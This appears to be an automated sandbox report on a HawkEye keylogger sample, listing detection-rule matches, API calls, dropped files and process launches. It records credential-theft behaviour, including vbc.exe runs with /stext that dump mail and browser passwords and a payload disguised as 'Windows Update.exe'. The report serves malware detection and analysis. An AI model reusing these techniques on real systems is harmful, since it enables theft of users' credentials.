          Source: 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.357332118.0000000007610000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
          Source: 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\5.exe Code function: 1_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_004030E3
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 00413F8E appears 66 times
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 00413E2D appears 34 times
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 00442A90 appears 36 times
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 004141D6 appears 88 times
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 00411538 appears 35 times
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: String function: 00401ED0 appears 46 times
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: String function: 0040569E appears 36 times
          Source: C:\Users\user\Desktop\5.exe Code function: String function: 00401ED0 appears 46 times
          Source: C:\Users\user\Desktop\5.exe Code function: String function: 0040569E appears 36 times
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 10_2_04BD5BAE NtWriteVirtualMemory,10_2_04BD5BAE
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 10_2_04BD5B06 NtUnmapViewOfSection,10_2_04BD5B06
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 10_2_04BD5976 NtQuerySystemInformation,10_2_04BD5976
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 10_2_04BD5B81 NtWriteVirtualMemory,10_2_04BD5B81
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 10_2_04BD5932 NtQuerySystemInformation,10_2_04BD5932
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 16_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,16_2_00408836
          Source: 5.exe, 00000001.00000003.263017568.0000000014BEF000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 5.exe
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 5.exe
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 5.exe
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemailpv.exe< vs 5.exe
          Source: 5.exe, 00000001.00000003.256130279.0000000014A56000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 5.exe
          Source: 5.exe Binary or memory string: OriginalFilename vs 5.exe
          Source: 5.exe Binary or memory string: OriginalFileName vs 5.exe
          Source: 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 5.exe
          Source: 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 5.exe
          Source: 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemailpv.exe< vs 5.exe
          Source: 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 5.exe
          Source: 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 5.exe
          Source: 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp Binary or memory string: OriginalFilenamemailpv.exe< vs 5.exe
          Source: 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 5.exe
          Source: 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 5.exe
          Source: 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamemailpv.exe< vs 5.exe
          Source: 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 5.exe
          Source: 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 5.exe
          Source: 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemailpv.exe< vs 5.exe
          Source: 5.exe, 00000002.00000002.291130576.0000000002861000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 5.exe
          Source: 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 5.exe
          Source: 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 5.exe
          Source: 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamemailpv.exe< vs 5.exe
          Source: 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs 5.exe
          Source: 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs 5.exe
          Source: 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamemailpv.exe< vs 5.exe
          Source: 5.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\5.exe File created: C:\Users\user\AppData\Roaming\Windows Update.exe
          Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@19/18@2/4
          Source: C:\Users\user\Desktop\5.exe File read: C:\Users\desktop.ini
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, Form1.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, Form1.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 16_2_00415AFD GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,16_2_00415AFD
          Source: C:\Users\user\Desktop\5.exe Code function: 2_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,2_2_00401489
          Source: 5.exe Virustotal: Detection: 41%
          Source: 5.exe ReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\5.exe File read: C:\Users\user\Desktop\5.exe
          Source: C:\Users\user\Desktop\5.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Users\user\Desktop\5.exe "C:\Users\user\Desktop\5.exe"
          Source: C:\Users\user\Desktop\5.exe Process created: C:\Users\user\Desktop\5.exe "C:\Users\user\Desktop\5.exe"
          Source: C:\Users\user\Desktop\5.exe Process created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Process created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2128
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
          Source: unknown Process created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe "C:\Users\user\AppData\Roaming\WindowsUpdate.exe"
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 2128
          Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe Process created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe "C:\Users\user\AppData\Roaming\WindowsUpdate.exe"
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 2128
          Source: C:\Users\user\Desktop\5.exe Process created: C:\Users\user\Desktop\5.exe "C:\Users\user\Desktop\5.exe"
          Source: C:\Users\user\Desktop\5.exe Process created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Process created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2128
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 2128
          Source: C:\Users\user\Desktop\5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 10_2_04BD4F7A AdjustTokenPrivileges,10_2_04BD4F7A
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 10_2_04BD4F43 AdjustTokenPrivileges,10_2_04BD4F43
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe System information queried: HandleInformation
          Source: C:\Users\user\Desktop\5.exe File created: C:\Users\user\AppData\Local\Temp\nsbB89.tmp
          Source: C:\Users\user\Desktop\5.exe Code function: 1_2_00402012 CoCreateInstance,MultiByteToWideChar,1_2_00402012
          Source: C:\Users\user\Desktop\5.exe Code function: 1_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_0040411B
          Source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Windows Update.exe, 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
          Source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
          Source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: C:\Users\user\Desktop\5.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\5.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Users\user\Desktop\5.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 16_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle, 16_2_00411196
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.cs Base64 encoded string: 'hxYuBRkiiqF2m5U/v+PiR2nswhUqG0SslS0sInRy44yND2XYDxDtrDNZ25ZQ5u6E', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.cs Base64 encoded string: 'hxYuBRkiiqF2m5U/v+PiR2nswhUqG0SslS0sInRy44yND2XYDxDtrDNZ25ZQ5u6E', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, Form1.cs Base64 encoded string: 'hxYuBRkiiqF2m5U/v+PiR2nswhUqG0SslS0sInRy44yND2XYDxDtrDNZ25ZQ5u6E', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, Form1.cs Base64 encoded string: 'hxYuBRkiiqF2m5U/v+PiR2nswhUqG0SslS0sInRy44yND2XYDxDtrDNZ25ZQ5u6E', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.cs Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.cs Cryptographic APIs: 'CreateDecryptor'
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.cs Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.cs Cryptographic APIs: 'CreateDecryptor'
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\5.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\Desktop\5.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
          Source: Binary string: mscorlib.pdbHrs source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
